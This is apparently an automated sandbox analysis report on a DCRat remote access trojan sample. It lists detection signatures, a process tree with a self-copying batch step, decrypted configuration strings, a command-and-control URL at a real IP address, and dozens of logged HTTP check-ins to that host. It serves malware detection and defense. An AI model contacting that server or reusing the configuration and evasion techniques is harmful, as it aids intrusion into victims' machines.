Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lfcdgbuksf.exe

Overview

General Information

Sample name:lfcdgbuksf.exe
Analysis ID:1565846
MD5:8c6e4c86c216b898f24ff14b417c4369
SHA1:266e7d01ba11cd7914451c798199596f4d2f7b53
SHA256:858fff104da670b640eff2a93b7fa4b794ae554c30a409864d00f3b7ecc1e09f
Tags:exeuser-aachum
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • lfcdgbuksf.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\lfcdgbuksf.exe" MD5: 8C6E4C86C216B898F24FF14B417C4369)
    • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7608 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7624 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • staticfile.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: 8C6E4C86C216B898F24FF14B417C4369)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://213.108.22.118/protectlinuxuniversaltrackcdn"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
lfcdgbuksf.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\staticfile.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            00000000.00000000.1679174176.0000000000962000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Process Memory Space: lfcdgbuksf.exe PID: 7440JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.lfcdgbuksf.exe.960000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T22:35:45.137435+010020480951A Network Trojan was detected192.168.2.449731213.108.22.11880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: lfcdgbuksf.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                  Source: C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.batAvira: detection malicious, Label: BAT/Delbat.C
                  Source: C:\Users\user\Desktop\DDWtiErR.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                  Source: C:\Users\user\Desktop\BRqdbrgY.logAvira: detection malicious, Label: TR/Agent.jbwuj
                  Source: C:\Users\user\Desktop\EGcTfavm.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                  Source: C:\Users\user\Desktop\MEQTIppb.logAvira: detection malicious, Label: TR/Agent.jbwuj
                  Found malware configuration
                  Source: lfcdgbuksf.exeMalware Configuration Extractor: DCRat {"C2 url": "http://213.108.22.118/protectlinuxuniversaltrackcdn"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\BRqdbrgY.logReversingLabs: Detection: 50%
                  Source: C:\Users\user\Desktop\DDWtiErR.logReversingLabs: Detection: 50%
                  Source: C:\Users\user\Desktop\EGcTfavm.logReversingLabs: Detection: 50%
                  Source: C:\Users\user\Desktop\MEQTIppb.logReversingLabs: Detection: 50%
                  Source: C:\Users\user\Desktop\ZFopJXMZ.logReversingLabs: Detection: 15%
                  Source: C:\Users\user\Desktop\aIuPGtQu.logReversingLabs: Detection: 15%
                  Source: C:\Users\user\Desktop\hADxImWJ.logReversingLabs: Detection: 37%
                  Source: C:\Users\user\Desktop\smdnokfM.logReversingLabs: Detection: 37%
                  Multi AV Scanner detection for submitted file
                  Source: lfcdgbuksf.exeReversingLabs: Detection: 65%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\dNlyfpHV.logJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\ZFopJXMZ.logJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\aIuPGtQu.logJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\eQsYbLKq.logJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: lfcdgbuksf.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: lfcdgbuksf.exeString decryptor: ["bcvlTM07tSfDnpCSnqcipK6mFmyo6AcJPTc1NOqy0V48LxA2GM4gGFYQgIfqYLAtzVyUNKFY9osUQ8bSm6htF5CJ5LVEtAZoULIz8qo6HfgcXDAirMEcoQn3ToZBzAp9","7a03fb45e1ca97b16588d3f108e53648f3d91c7e6cfbf7d76f10fd2dfc23d446","0","","","5","2","WyIzIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvc3RhdGljZmlsZS5leGUiLCI1Il0=","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                  Source: lfcdgbuksf.exeString decryptor: [["http://213.108.22.118/","protectlinuxuniversaltrackcdn"]]
                  Source: lfcdgbuksf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: lfcdgbuksf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 4x nop then jmp 00007FFD9B7FDFC6h0_2_00007FFD9B7FDDAD
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 4x nop then jmp 00007FFD9B9FDFC6h6_2_00007FFD9B9FDDAD

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 213.108.22.118:80
                  Uses ping.exe to check the status of other devices and networks
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                  Source: Joe Sandbox ViewASN Name: SPEEDYLINERU SPEEDYLINERU
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 332Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 384Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1404Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1376Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1404Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
